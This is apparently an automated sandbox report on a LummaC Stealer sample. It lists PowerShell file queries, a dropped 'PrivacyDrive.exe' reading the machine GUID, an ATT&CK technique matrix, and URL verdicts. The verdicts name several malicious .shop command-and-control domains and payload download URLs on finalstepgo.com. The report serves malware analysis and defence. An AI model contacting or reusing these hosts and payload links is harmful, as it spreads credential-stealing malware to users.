Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 BITS Jobs	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 PowerShell	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	1 BITS Jobs	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://google.com	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
http://www.broofa.com	0%	URL Reputation	safe
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	0%	URL Reputation	safe
https://apis.google.com/js/api.js	0%	URL Reputation	safe
https://fonts.google.com/license/googlerestricted	0%	URL Reputation	safe
http://schema.org/WebPage	0%	URL Reputation	safe
https://support.google.com/	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://csp.withgoogle.com/csp/lcreport/	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
https://domains.google.com/suggest/flow	0%	URL Reputation	safe
https://ogs.google.com/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=	0%	URL Reputation	safe
https://push.clients6.google.com/upload/	0%	URL Reputation	safe
https://www.google.com/gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&dt19=2&prm23=0&zx=1727366128125&opi=89978449	0%	Avira URL Cloud	safe
https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA	0%	Avira URL Cloud	safe
https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png	0%	Avira URL Cloud	safe
https://ogs.google.com/	0%	Avira URL Cloud	safe
https://www.google.com/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1	0%	Avira URL Cloud	safe
abortinoiwiam.shop	100%	Avira URL Cloud	malware
https://ogs.google.com/widget/callout	0%	Avira URL Cloud	safe
https://www.google.com/client_204?atyp=i&biw=1280&bih=907&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449	0%	Avira URL Cloud	safe
http://www.gphysics.com	0%	Avira URL Cloud	safe
defenddsouneuw.shop	100%	Avira URL Cloud	malware
priooozekw.shop	100%	Avira URL Cloud	malware
https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4	0%	Avira URL Cloud	safe
https://www.google.com/webhp	0%	Avira URL Cloud	safe
surroundeocw.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/u	100%	Avira URL Cloud	malware
https://www.google.com	0%	Avira URL Cloud	safe
https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=1/ed=1/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl	0%	Avira URL Cloud	safe
https://www.google.com/logos/doodles/2024/popcorn/rc4/popcorn.js	0%	Avira URL Cloud	safe
candleduseiwo.shop	100%	Avira URL Cloud	malware
https://www.google.com/gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&ct=slh&v=t1&im=M&m=HV&pv=0.9621399517689093&me=1:1727366123896,V,0,0,1280,907:0,B,907:0,N,1,64P1ZseiHfKwi-gPg-6IsAw:0,R,1,1,0,0,1280,907:4231,x:2883,G,1,1,395,514:2659,h,1,1,o:651,e,B&zx=1727366134321&opi=89978449	0%	Avira URL Cloud	safe
https://ogs.google.com/widget/callout?eom=1	0%	Avira URL Cloud	safe
https://www.google.com/tools/feedback	0%	Avira URL Cloud	safe
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&nt=navigate&t=fi&st=10053&fid=1&zx=1727366131013&opi=89978449	0%	Avira URL Cloud	safe
http://crl.thawte.com/ThawtePremiumServerCA.crl0	0%	Avira URL Cloud	safe
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4	0%	Avira URL Cloud	safe
https://www.google.com/logos/2024/popcorn/rc4/cta.png	0%	Avira URL Cloud	safe
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&t=all&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&adh=&cls=0.000046949291965270124&ime=1&imeae=0&imeap=0&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=203802&ucb=203802&ts=204102&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&net=dl.1500,ect.3g,rtt.300&hp=&sys=hc.4&p=bs.true&rt=hst.35,cbt.97,prt.1023,afti.1476,aft.1476,aftqf.1477,xjses.2440,xjsee.2491,xjs.2491,lcp.1481,fcp.1017,wsrt.2066,cst.677,dnst.9,rqst.730,rspt.361,sslt.677,rqstt.1697,unt.1010,cstt.1020,dit.3112&zx=1727366125369&opi=89978449	0%	Avira URL Cloud	safe
https://finalstepgo.com/uploads/il222.zip	100%	Avira URL Cloud	malware
https://www.google.com/_/og/promos/	0%	Avira URL Cloud	safe
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4	0%	Avira URL Cloud	safe
https://www.google.com/logos/2024/popcorn/rc4/messages.en.nocache.json	0%	Avira URL Cloud	safe
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4	0%	Avira URL Cloud	safe
https://www.google.com/gen_204?s=webhp&t=aft&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,aft.1476,afti.1476,cbt.97,hst.35,prt.1023&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449&ts=204102	0%	Avira URL Cloud	safe
https://www.thawte.com/cps0	0%	Avira URL Cloud	safe
https://www.google.com/logos/2024/popcorn/rc4/preload-sprite.png	0%	Avira URL Cloud	safe
https://www.google.com/gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=64P1ZseiHfKwi-gPg-6IsAw&zx=1727366130436&opi=89978449	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
https://plus.google.com	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/	100%	Avira URL Cloud	malware
https://www.cybertronsoft.com	0%	Avira URL Cloud	safe
https://play.google.com/log?format=json&hasfast=true	0%	Avira URL Cloud	safe
racedsuitreow.shop	100%	Avira URL Cloud	malware
https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp	0%	Avira URL Cloud	safe
https://use.typekit.net	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/api9	100%	Avira URL Cloud	malware
https://clients6.google.com	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/gws/other-hp	0%	Avira URL Cloud	safe
https://issues.chromium.org/issues/40757070).	0%	Avira URL Cloud	safe
https://www.google.com/intl/en/about/products	0%	Avira URL Cloud	safe
covvercilverow.shop	100%	Avira URL Cloud	malware
pumpkinkwquo.shop	100%	Avira URL Cloud	malware
https://www.google.com/log?format=json&hasfast=true	0%	Avira URL Cloud	safe
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,cbt.97,hst.35&opi=89978449&ts=300	0%	Avira URL Cloud	safe
http://www.google.com/doodles/_SHARE?description=	0%	Avira URL Cloud	safe
https://www.google.com/url?q	0%	Avira URL Cloud	safe
deallyharvenw.shop	100%	Avira URL Cloud	malware
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0	0%	Avira URL Cloud	safe
https://lens.google.com	0%	Avira URL Cloud	safe
https://www.google.com/logos/2024/popcorn/rc4/preload-bg-sprite.jpg	0%	Avira URL Cloud	safe
https://lens.google.com/gen204	0%	Avira URL Cloud	safe
https://finalstepgo.com/uploads/il2.txt	100%	Avira URL Cloud	malware
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245,hpbarr.1030&zx=1727366129148&opi=89978449	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/api	100%	Avira URL Cloud	malware
https://ogs.google.com/widget/app/so?eom=1	0%	Avira URL Cloud	safe
https://www.google.com/logos/2024/popcorn/rc4/google_frame_mask.png	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
https://play.google.com/log?format=json&hasfast=true&authuser=0	0%	Avira URL Cloud	safe
https://support.google.com/websearch/answer/106230	0%	Avira URL Cloud	safe
https://www.google.com/client_204?cs=1&opi=89978449	0%	Avira URL Cloud	safe
http://www.privacy-drive.comx	0%	Avira URL Cloud	safe
https://www.google.com/gen_204?atyp=csi&ei=8YP1Zq3GL5iK9u8P68momQ0&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&hp=&rt=ttfb.1024,st.1025,bs.27,aaft.1026,acrt.1026,art.1027&zx=1727366129148&opi=89978449	0%	Avira URL Cloud	safe
https://google.com/	0%	Avira URL Cloud	safe
https://www.google.com/async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fck%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ,_fmt:prog,_id:_64P1ZseiHfKwi-gPg-6IsAw_8	0%	Avira URL Cloud	safe
https://www.thawte.com/cps0/	0%	Avira URL Cloud	safe
